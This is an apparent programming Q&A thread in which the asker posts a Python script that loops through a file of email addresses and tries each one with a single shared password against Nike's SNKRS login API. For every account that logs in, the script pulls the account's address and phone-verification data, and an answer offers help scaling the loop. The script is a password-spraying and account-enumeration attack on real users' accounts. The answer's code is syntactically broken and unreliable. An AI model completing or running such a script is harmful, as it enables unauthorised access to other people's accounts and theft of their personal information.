# Using a email list from .txt file to cycle through and test logins?

Tags: python

Basically I have a list of emails on a .txt file. My goal is to run through each of them one by one and test to see if accounts are valid. What I'm trying to set up in my code is to set variable to go up one by one with this `login = email[0].format(start + i)`. In theory this would change the selection of the emails in my list. So each time a new email is selected it would run the code with that email. But it seems to just pick `[0]` every time, is this the correct method for what I'm trying to obtain? If not would you be able to point in a more efficient method of obtaining each email to run in the code?

I also was thinking this may be something i should try `login = email[num]` but i get a error asking for a integer not a string. Any advice on which direction to go would be greatly appreciated.

CODE

```
import requests
import time

start = 1
#while True:
for i in range(500):
    password = 'abcdefg'
    num = ('{0}').format(start + i)

    with open('email.txt') as email_text:
        email = email_text.read().splitlines()

    login = email[0].format(start + i)
    #login = email[num]

    APP_VERSION = '100'
    EXPERIENCE = '200'

    session = requests.Session()
    session.headers.update({
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36'
    })
    session.get('https://www.nike.com/snkrs/')
    try:
        print(login)
        print('Logging in...')
        login_data = {
            'username': login,
            'password': password,
            'keepMeLoggedIn': True,
            'client_id': 'hfkjshfkjshfkjshdf',
            'ux_id': 'com.nike.commerce.snkrs.web',
            'grant_type': 'password'
        }
        login_params = {
            'appVersion': APP_VERSION,
            'experienceVersion': EXPERIENCE,
            'uxid': 'com.nike.commerce.snkrs.web',
            'locale': 'en_US',
            'backendEnvironment': 'identity',
            'browser': 'Google Inc.',
            'os': 'undefined',
            'mobile': 'false',
            'native': 'false'
        }
        login_url = 'https://unite.nike.com/loginWithSetCookie'

        login_res = session.post(login_url, json=login_data, params=login_params)
        time.sleep(1)
    except:
        pass
        time.sleep(1)
        access_token = None
    try:
        access_token = login_res.json()['access_token']
    except ValueError:
        print('Could not login.')
    except KeyError:
        print('Could not login.')
    if not access_token:
        quit()

    print('Logged in.')

    print('Getting address info...')

    get_address_params = {
        'appVersion': APP_VERSION,
        'experienceVersion': EXPERIENCE,
        'uxid': 'com.nike.commerce.snkrs.web',
        'locale': 'en_US',
        'backendEnvironment': 'identity',
        'browser': 'Google Inc.',
        'os': 'undefined',
        'mobile': 'false',
        'native': 'false',
        'viewId': 'commerce',
        'token': access_token
    }
    get_address_url = 'https://unite.nike.com/getUserService'
    get_address_res = session.get(get_address_url, params=get_address_params)
    print('Retreived address info.')

    verified = 'verifiedphone' in get_address_res.json()
    print('Verified: '+str(verified))
```

Comment: I'm not sure if there's some reason you're not just doing `for line in email_text` inside your with statement.

Answer (score 0):

1. pip install pandas
2. Your email list should be a csv or excel.
3. Lets assume your emails as stores in the emails column

   ```
   import pandas as pd

   df = pd.read_csv('file.csv')

   def check_valid_emails():
       try:
       """login and check emails valid
        assign responses """
       is_valid = response.post(login here)
       except:
   return {'email':email,'valid':''}

   valid_emails_report = map(check_valid_emails,df.emails.tolist())
   pd.DataFrame(valid_emails_report)
   ```